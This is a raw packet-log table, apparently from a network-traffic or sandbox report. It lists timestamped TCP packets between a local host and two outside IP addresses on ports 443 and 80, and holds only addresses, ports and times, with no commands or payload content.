Nov 20, 2024 08:28:12.686690092 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.686700106 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686739922 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686841011 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.686846972 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686863899 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686912060 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686945915 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.686954021 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.686968088 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.687103033 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.687228918 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.687235117 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.731872082 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.732076883 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.732094049 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.775814056 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.775871992 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.775959969 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.775984049 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.775996923 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.776046991 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776137114 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.776144981 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776187897 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776267052 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.776273012 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776344061 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776458025 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776468992 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.776478052 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776598930 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776657104 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.776657104 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.776665926 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776810884 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776859045 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.776870012 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.776977062 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.777084112 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.777137041 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.777137041 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.777144909 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.777292967 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.777343035 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.777354002 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.777725935 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.777771950 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.777787924 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.777800083 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.777811050 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.777875900 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.777875900 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.777884960 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.822798967 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.823220015 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.823235989 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.866622925 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.866729021 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.866748095 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.866790056 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.866859913 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.866871119 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.866972923 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.867063999 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.867074013 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.867348909 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.867413044 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.867419958 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.867742062 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.867799044 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.867805004 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.868063927 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.868139029 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.868148088 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.868525028 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.868650913 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.868658066 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.868864059 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.868978977 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.868985891 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869071960 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869138002 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.869146109 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869245052 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869461060 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.869467974 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869502068 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869573116 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869591951 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.869599104 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869620085 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869643927 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.869705915 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.869713068 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869729042 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869776011 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869796038 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.869803905 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.869853020 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.913407087 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.913556099 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.913566113 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.957360983 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.957463026 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.957480907 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.957536936 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.957600117 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.957617998 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.957828999 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.957928896 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.957937956 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.958091021 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.958210945 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.958219051 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.958395958 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.958646059 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.958652020 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.958669901 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.958738089 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.958744049 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.958952904 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.959007025 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.959022045 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.959249973 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.959332943 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.959342003 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.959492922 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.959544897 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.959549904 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.959667921 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.959796906 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.959805012 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.959920883 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.960113049 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.960180998 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.960180998 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.960189104 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.960314989 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.960407972 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.960412979 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.960535049 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.960588932 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.960602999 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.960690975 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:12.960742950 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:12.960757971 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.004251003 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.004362106 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:13.004374027 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048320055 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048392057 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:13.048402071 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048542023 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048599958 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048599958 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:13.048615932 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048657894 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:13.048665047 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048676014 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048719883 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048722982 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:13.048732996 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048773050 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:13.048780918 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048857927 CET	443	49725	142.215.209.78	192.168.2.6
Nov 20, 2024 08:28:13.048896074 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:13.051614046 CET	49725	443	192.168.2.6	142.215.209.78
Nov 20, 2024 08:28:16.109682083 CET	49712	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.252341986 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.258220911 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.258323908 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.258450985 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.264377117 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835448027 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835496902 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835509062 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835527897 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835540056 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835553885 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835563898 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835581064 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835592985 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835607052 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.835822105 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.835823059 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.840743065 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.840789080 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.840801001 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.840816021 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.840838909 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.840853930 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.921967030 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.921986103 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922008991 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922019958 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922039032 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922049999 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922063112 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922095060 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.922255993 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.922895908 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922913074 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922925949 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922944069 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.922971964 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.922980070 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.922992945 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.923043013 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.923846960 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.923860073 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.923871994 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.923892021 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.923902035 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.923904896 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.923934937 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.924734116 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.924781084 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.924789906 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.924802065 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.924813986 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.924827099 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.924834967 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.924877882 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:28.925627947 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.964195013 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.964227915 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.964240074 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:28.964338064 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.008543015 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008593082 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008605957 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008656025 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008672953 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008686066 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008698940 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008711100 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008722067 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008733988 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008744955 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.008838892 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.008838892 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.008838892 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.008838892 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.008838892 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.009232044 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009247065 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009258032 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009269953 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009282112 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009283066 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.009296894 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.009321928 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.009763956 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009862900 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009875059 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009887934 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009898901 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009902954 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.009911060 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009922981 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.009924889 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.009948015 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.010670900 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.010714054 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.010760069 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.010777950 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.010791063 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.010802984 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.010807037 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.010816097 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.010838985 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.028922081 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.028942108 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.028959036 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.028971910 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.028978109 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.028990984 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029001951 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029015064 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029026985 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029139996 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.029139996 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.029139996 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.029319048 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029356956 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.029382944 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029395103 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029408932 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029421091 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.029422045 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029468060 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.029784918 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029833078 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.029870987 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.050574064 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.050595045 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.050607920 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.050618887 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.050632000 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.050638914 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.050693989 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.094491959 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094537973 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094553947 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094571114 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.094573021 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094584942 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094595909 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094614983 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094626904 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094643116 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094655037 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.094772100 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.094772100 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.094772100 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.095156908 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095199108 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.095206976 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095249891 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095285892 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.095304966 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095326900 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095340014 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095362902 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.095643997 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095657110 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095669985 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095680952 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.095700979 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.095733881 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095746040 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095757961 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095769882 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095779896 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.095794916 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.095820904 CET	54436	80	192.168.2.6	192.3.22.13
Nov 20, 2024 08:28:29.096326113 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.096338987 CET	80	54436	192.3.22.13	192.168.2.6
Nov 20, 2024 08:28:29.096350908 CET	80	54436	192.3.22.13	192.168.2.6
